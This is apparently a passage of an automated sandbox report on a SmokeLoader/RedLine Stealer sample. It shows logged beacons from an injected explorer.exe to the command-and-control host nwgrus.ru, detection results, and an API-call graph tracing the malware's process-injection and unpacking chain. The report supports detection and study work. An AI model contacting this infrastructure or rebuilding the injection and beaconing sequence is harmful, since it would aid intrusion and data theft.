2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.449766109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:03:03.945909977 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ievjgxgogeu.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 206
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:03:03.945910931 CEST206OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 76 2d dd e6
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuv-jFSR}Ow>s1g,!PF0'TOBYTiMq)|1UL4-s6i
                                      Oct 14, 2024 10:03:04.822065115 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:03:04 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.449767109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:03:04.831216097 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://kavychcxkrxbq.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 178
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:03:04.831258059 CEST178OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 3c 20 ab f1
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu< MHV{\HvQL>~2s64_2\]M] y"x@d2'G
                                      Oct 14, 2024 10:03:05.614105940 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:03:05 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.449769109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:03:05.622786999 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://nsmkoqlnxxds.com/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 221
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:03:05.622817039 CEST221OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 59 45 cf e3
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuYE\1BogM<O=3IVD^X&7610D4F9^B4,_>Z9,|v'@f*zhz
                                      Oct 14, 2024 10:03:06.417629004 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:03:06 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.2.449770109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:03:06.462102890 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://gljrhsxnugi.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 344
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:03:06.462138891 CEST344OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 33 1e aa b9
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[*k,vu3uZNf2J:T5Ai,A0#6&]eJv7Dy&kb2/zhUDEPW!zMFi,TwFA6J:
                                      Oct 14, 2024 10:03:07.311100960 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:03:07 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.2.449772109.175.29.39802580C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 14, 2024 10:03:07.320449114 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://ublngteflakx.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 347
                                      Host: nwgrus.ru
                                      Oct 14, 2024 10:03:07.320485115 CEST347OUTData Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 62 1d e2 b9
                                      Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[+k,vubcNG=0V :kx#P6yKL0 uRGz=nTf|R_,9_WAAm"Jhg,^x
                                      Oct 14, 2024 10:03:08.127748966 CEST484INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 14 Oct 2024 08:03:08 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:04:02:09
                                      Start date:14/10/2024
                                      Path:C:\Users\user\Desktop\3sfCdeA1H2.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\3sfCdeA1H2.exe"
                                      Imagebase:0x400000
                                      File size:265'728 bytes
                                      MD5 hash:91BE25F31B7891908A50DFDC9F03F2B4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:04:02:17
                                      Start date:14/10/2024
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\Explorer.EXE
                                      Imagebase:0x7ff72b770000
                                      File size:5'141'208 bytes
                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:04:02:36
                                      Start date:14/10/2024
                                      Path:C:\Users\user\AppData\Roaming\tttcvva
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\tttcvva
                                      Imagebase:0x7ff70f330000
                                      File size:265'728 bytes
                                      MD5 hash:91BE25F31B7891908A50DFDC9F03F2B4
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2055364518.0000000004770000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2055184698.0000000002C5D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 42%, ReversingLabs
                                      • Detection: 38%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:true

                                      Target ID:10
                                      Start time:04:03:39
                                      Start date:14/10/2024
                                      Path:C:\Windows\System32\WerFault.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 2580 -s 4964
                                      Imagebase:0x7ff6d9380000
                                      File size:570'736 bytes
                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:04:03:42
                                      Start date:14/10/2024
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:explorer.exe
                                      Imagebase:0x7ff72b770000
                                      File size:5'141'208 bytes
                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:9.3%
                                        Dynamic/Decrypted Code Coverage:28.7%
                                        Signature Coverage:41.5%
                                        Total number of Nodes:171
                                        Total number of Limit Nodes:5
                                        execution_graph 3417 402e40 3419 402e37 3417->3419 3420 402edf 3419->3420 3421 4018e6 3419->3421 3422 4018f5 3421->3422 3423 40192e Sleep 3422->3423 3424 401949 3423->3424 3426 40195a 3424->3426 3427 401514 3424->3427 3426->3420 3428 401524 3427->3428 3429 4015c4 NtDuplicateObject 3428->3429 3434 4016e0 3428->3434 3430 4015e1 NtCreateSection 3429->3430 3429->3434 3431 401661 NtCreateSection 3430->3431 3432 401607 NtMapViewOfSection 3430->3432 3433 40168d 3431->3433 3431->3434 3432->3431 3435 40162a NtMapViewOfSection 3432->3435 3433->3434 3436 401697 NtMapViewOfSection 3433->3436 3434->3426 3435->3431 3437 401648 3435->3437 3436->3434 3438 4016be NtMapViewOfSection 3436->3438 3437->3431 3438->3434 3439 417460 3442 417090 3439->3442 3441 417465 3443 41709d 3442->3443 3444 417157 InterlockedExchangeAdd ReadConsoleA FindAtomW GetConsoleFontSize SearchPathW 3443->3444 3445 41729e 3443->3445 3447 4171bb 7 API calls 3444->3447 3446 4172b0 SetCommState 3445->3446 3450 4172c9 3445->3450 3446->3445 3448 417270 GetBoundsRect 3447->3448 3449 417279 3447->3449 3448->3449 3451 417282 OpenFileMappingA 3449->3451 3452 41728f 3449->3452 3453 4172d2 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA 3450->3453 3454 417307 3450->3454 3451->3452 3452->3445 3453->3454 3464 416cd0 LocalAlloc 3454->3464 3458 417344 LoadLibraryA 3465 416d00 GetModuleHandleW GetProcAddress VirtualProtect 3458->3465 3459 41739d 3466 416ff0 3459->3466 3461 4173a2 3462 4173d9 InterlockedDecrement 3461->3462 3463 4173ef 3461->3463 3462->3461 3463->3441 3464->3458 3465->3459 3467 417019 QueryDosDeviceA 3466->3467 3468 41702a 3466->3468 3467->3468 3477 416e90 3468->3477 3471 417045 3480 416ed0 3471->3480 3472 41703d FreeEnvironmentStringsA 3472->3471 3475 417073 3475->3461 3476 41705c HeapDestroy GetNumaProcessorNode 3476->3475 3478 416ea1 FatalAppExitA GetModuleHandleW 3477->3478 3479 416eb3 3477->3479 3478->3479 3479->3471 3479->3472 3481 416edd 3480->3481 3482 416f09 3481->3482 3483 416ef8 BuildCommDCBA 3481->3483 3484 416f11 WritePrivateProfileStringW FreeEnvironmentStringsA 3482->3484 3487 416f33 3482->3487 3483->3487 3484->3487 3486 416fba 3486->3475 3486->3476 3487->3486 3488 416f69 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3487->3488 3489 416ec0 3487->3489 3488->3487 3492 416e50 3489->3492 3493 416e79 3492->3493 3494 416e6c SetEvent 3492->3494 3493->3487 3494->3493 3593 401542 3594 40153b 3593->3594 3595 4015c4 NtDuplicateObject 3594->3595 3600 4016e0 3594->3600 3596 4015e1 NtCreateSection 3595->3596 3595->3600 3597 401661 NtCreateSection 3596->3597 3598 401607 NtMapViewOfSection 3596->3598 3599 40168d 3597->3599 3597->3600 3598->3597 3601 40162a NtMapViewOfSection 3598->3601 3599->3600 3602 401697 NtMapViewOfSection 3599->3602 3601->3597 3603 401648 3601->3603 3602->3600 3604 4016be NtMapViewOfSection 3602->3604 3603->3597 3604->3600 3629 417363 3630 417370 LoadLibraryA 3629->3630 3638 416d00 GetModuleHandleW GetProcAddress VirtualProtect 3630->3638 3633 41739d 3634 416ff0 15 API calls 3633->3634 3635 4173a2 3634->3635 3636 4173d9 InterlockedDecrement 3635->3636 3637 4173ef 3635->3637 3636->3635 3638->3633 3567 2c90001 3568 2c90005 3567->3568 3573 2c9092b GetPEB 3568->3573 3570 2c90030 3575 2c9003c 3570->3575 3574 2c90972 3573->3574 3574->3570 3576 2c90049 3575->3576 3577 2c90e0f 2 API calls 3576->3577 3578 2c90223 3577->3578 3579 2c90d90 GetPEB 3578->3579 3580 2c90238 VirtualAlloc 3579->3580 3581 2c90265 3580->3581 3582 2c902ce VirtualProtect 3581->3582 3584 2c9030b 3582->3584 3583 2c90439 VirtualFree 3587 2c904be LoadLibraryA 3583->3587 3584->3583 3586 2c908c7 3587->3586 3588 2c90005 3589 2c9092b GetPEB 3588->3589 3590 2c90030 3589->3590 3591 2c9003c 7 API calls 3590->3591 3592 2c90038 3591->3592 3662 402dd0 3664 402ddc 3662->3664 3663 402edf 3664->3663 3665 4018e6 8 API calls 3664->3665 3665->3663 3548 4018f1 3549 4018f6 3548->3549 3550 40192e Sleep 3549->3550 3551 401949 3550->3551 3552 401514 7 API calls 3551->3552 3553 40195a 3551->3553 3552->3553 3495 2cdf2d9 3498 2cdf2e8 3495->3498 3499 2cdf2f7 3498->3499 3502 2cdfa88 3499->3502 3503 2cdfaa3 3502->3503 3504 2cdfaac CreateToolhelp32Snapshot 3503->3504 3505 2cdfac8 Module32First 3503->3505 3504->3503 3504->3505 3506 2cdf2e7 3505->3506 3507 2cdfad7 3505->3507 3509 2cdf747 3507->3509 3510 2cdf772 3509->3510 3511 2cdf783 VirtualAlloc 3510->3511 3512 2cdf7bb 3510->3512 3511->3512 3513 2c9003c 3514 2c90049 3513->3514 3526 2c90e0f SetErrorMode SetErrorMode 3514->3526 3519 2c90265 3520 2c902ce VirtualProtect 3519->3520 3522 2c9030b 3520->3522 3521 2c90439 VirtualFree 3525 2c904be LoadLibraryA 3521->3525 3522->3521 3524 2c908c7 3525->3524 3527 2c90223 3526->3527 3528 2c90d90 3527->3528 3529 2c90dad 3528->3529 3530 2c90dbb GetPEB 3529->3530 3531 2c90238 VirtualAlloc 3529->3531 3530->3531 3531->3519 3649 401915 3650 4018c6 3649->3650 3651 40191a 3649->3651 3652 40192e Sleep 3651->3652 3653 401949 3652->3653 3654 401514 7 API calls 3653->3654 3655 40195a 3653->3655 3654->3655 3532 402f97 3533 4030ee 3532->3533 3534 402fc1 3532->3534 3534->3533 3535 40307c RtlCreateUserThread NtTerminateProcess 3534->3535 3535->3533 3639 402d7b 3642 402d38 3639->3642 3640 402dc7 3641 4018e6 8 API calls 3641->3640 3642->3639 3642->3640 3642->3641 3554 4014fe 3555 401506 3554->3555 3556 401531 3554->3556 3557 4015c4 NtDuplicateObject 3556->3557 3562 4016e0 3556->3562 3558 4015e1 NtCreateSection 3557->3558 3557->3562 3559 401661 NtCreateSection 3558->3559 3560 401607 NtMapViewOfSection 3558->3560 3561 40168d 3559->3561 3559->3562 3560->3559 3563 40162a NtMapViewOfSection 3560->3563 3561->3562 3564 401697 NtMapViewOfSection 3561->3564 3563->3559 3565 401648 3563->3565 3564->3562 3566 4016be NtMapViewOfSection 3564->3566 3565->3559 3566->3562

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
